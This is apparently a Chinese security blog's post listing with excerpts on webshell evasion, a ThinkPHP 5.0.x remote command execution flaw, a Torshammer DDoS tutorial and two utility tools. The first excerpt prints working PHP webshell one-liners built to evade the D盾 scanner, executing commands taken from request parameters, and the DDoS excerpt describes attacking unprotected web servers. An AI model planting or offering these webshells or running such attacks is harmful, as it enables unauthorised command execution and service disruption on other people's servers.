News:禁止使用本博客的技术文章、源码、工具等用于非法用途,否则后果自负。

The Lastest

漏洞研究

过D盾一句话

jasonx 1226 0

免杀命令执行食用方法:/shell.php post:c=dir1:<?php $c=1;$a=$_POST;extract($a);print_r(`$c`); ?> 2:<?php echo `$_=$_REQUEST[c]`; ?> 免杀webshell1:<?php $a=call_user_func(function($u){return @$_REQUEST[$u];},'1'); eva...

漏洞研究

ThinkPHP 5.0.x再次爆出远程命令执行漏洞

jasonx 2657 0

前言ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企 业应用开发而诞生的。由于其简单易用,国内用户众多。2019年1月11日ThinkPHP团队发布了版本更新,本次更新包含了一个可能GetShell的安全更新,具体内容为改进Request类的method方法。漏洞描述Thinphp团队在实现框架中的核心类Requests的method方法实现了表单请求类型伪装,默认为$...

常用软件

SEO超链接生成工具

jasonx 1697 0

更新说明2.7 解决部分关键词乱码问题2.6 添加了敏感关键词检测及删除功能2.5 修正了随机关键词顺序会重复的问题。关键词SEO工具SEO工具箱SEO超链接生成工具SEO超链接生成软件作用本软件可以让关键词自动生成超链接,适合网站做SEO使用。用法在程序目录下,把挖到的关键词一行一个放进去,注意不要有空行。然后打开软件,设置好你要生成的数量,超链接URL和随机的网页ID值。点击生成就可以得到代码,复制到你网站上,黏贴就行了。软件...

渗透测试

使用Torshammer执行DDoS压力测试

jasonx 1320 2

用的方法很少,声称DDoS或任何类型的网络丢失都是成功的。让我们看一下执行DDoS攻击的方法之一。这种攻击非常强大,并且需要您应该知道如何在Kali Linux操作系统上操作命令的唯一技能。首先,如果你想检查任何网站都有它的TCP端口80开启与否,你可以去nmap和给定的所有教程NMAP。我们使用的这个工具是Torshammer。它是用Python编写的,可以在实例中对未受保护的Web服务器造成损害,这就是为什么它是一个缓慢的后期...

常用软件

常用电子货币汇率转换工具

jasonx 1867 0

更新说明2019年6月23日更新说明:更换美元查询接口,原接口已无法使用。2019年4月23日更新说明:更换比特币查询接口,数据更精准。2019年4月8日更新说明:删除USDT转换增加美元汇率转换之前下载过的朋友请重新下载这次更新了比较稳定的查询接口,解决了获取不到价格的小bug。关键词比特币汇率 比特币汇率转换 门罗币汇率 门罗币汇率转换 泰达币汇率 BTC汇率 XMR汇率 USDT汇率作用本软件可以实现...